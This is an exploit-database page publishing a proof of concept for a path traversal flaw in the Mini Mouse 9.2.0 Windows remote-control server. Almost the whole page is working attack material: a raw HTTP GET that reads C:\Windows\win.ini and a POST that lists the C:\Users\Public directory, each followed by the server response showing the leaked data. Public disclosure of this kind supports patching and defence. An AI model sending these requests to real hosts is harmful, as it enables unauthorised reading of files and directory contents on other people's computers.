Share
## https://sploitus.com/exploit?id=PACKETSTORM:162079
# Exploit Title: Mini Mouse 9.2.0 - Path Traversal  
# Author: gosh  
# Date: 02-04-2021  
# Vendor Homepage: http://yodinfo.com  
# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi  
# Version: 9.2.0  
# Tested on: Windows 10 Pro build 19042.662  
  
POC  
  
GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1  
Host: 192.168.1.111:8039  
Content-Type: application/json  
Connection: keep-alive  
Accept: */*  
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)  
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8  
Content-Length: 0  
Accept-Encoding: gzip, deflate  
  
{}  
  
  
  
  
.......................................................  
  
HTTP/1.1 200 OK  
Server: bruce_wy/1.0.0  
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS  
Access-Control-Allow-Headers: Content-Type,Origin,Accept  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Credentials: true  
P3P: CP=CAO PSA OUR  
Content-Type: application/octet-stream  
Content-Range: bytes 0-0/92  
Content-Length : 92  
  
; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1  
  
  
second POC:  
  
POST /op=get_file_list HTTP/1.1  
Host: 192.168.1.111:8039  
Content-Type: application/json  
Connection: keep-alive  
Accept: */*  
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)  
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8  
Content-Length: 28  
Accept-Encoding: gzip, deflate  
  
{"path":"C:\\Users\\Public"}  
  
  
  
.............................................................  
  
HTTP/1.1 200 OK  
Server: bruce_wy/1.0.0  
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS  
Access-Control-Allow-Headers: Content-Type,Origin,Accept  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Credentials: true  
P3P: CP=CAO PSA OUR  
Content-Type: application/json  
Content-Range: bytes 0-0/-1  
  
{  
"ret_code": 1,  
"ret_msg": "success",  
"data": {  
"list": [{  
"path": "C:\\Users\\Public\\AccountPictures",  
"is_hide": true,  
"is_floder": true,  
"name": "AccountPictures",  
"name_display": "AccountPictures",  
"file_size": 0,  
"create_time": 1615677,  
"update_time": 1615737,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\Desktop",  
"is_hide": true,  
"is_floder": true,  
"name": "Desktop",  
"name_display": "Desktop",  
"file_size": 0,  
"create_time": 1575713,  
"update_time": 1617276,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\desktop.ini",  
"is_hide": true,  
"is_floder": false,  
"name": "desktop.ini",  
"name_display": "desktop",  
"file_size": 174,  
"create_time": 1575713,  
"update_time": 1575713,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\Documents",  
"is_hide": false,  
"is_floder": true,  
"name": "Documents",  
"name_display": "Documents",  
"file_size": 0,  
"create_time": 1575713,  
"update_time": 1575713,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\Downloads",  
"is_hide": false,  
"is_floder": true,  
"name": "Downloads",  
"name_display": "Downloads",  
"file_size": 0,  
"create_time": 1575713,  
"update_time": 1575713,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\Libraries",  
"is_hide": true,  
"is_floder": true,  
"name": "Libraries",  
"name_display": "Libraries",  
"file_size": 0,  
"create_time": 1575713,  
"update_time": 1575714,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\Music",  
"is_hide": false,  
"is_floder": true,  
"name": "Music",  
"name_display": "Music",  
"file_size": 0,  
"create_time": 1575713,  
"update_time": 1575713,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\Pictures",  
"is_hide": false,  
"is_floder": true,  
"name": "Pictures",  
"name_display": "Pictures",  
"file_size": 0,  
"create_time": 1575713,  
"update_time": 1575713,  
"sys_type": 2  
}, {  
"path": "C:\\Users\\Public\\Videos",  
"is_hide": false,  
"is_floder": true,  
"name": "Videos",  
"name_display": "Videos",  
"file_size": 0,  
"create_time": 1575713,  
"update_time": 1575713,  
"sys_type": 2  
}]  
}  
}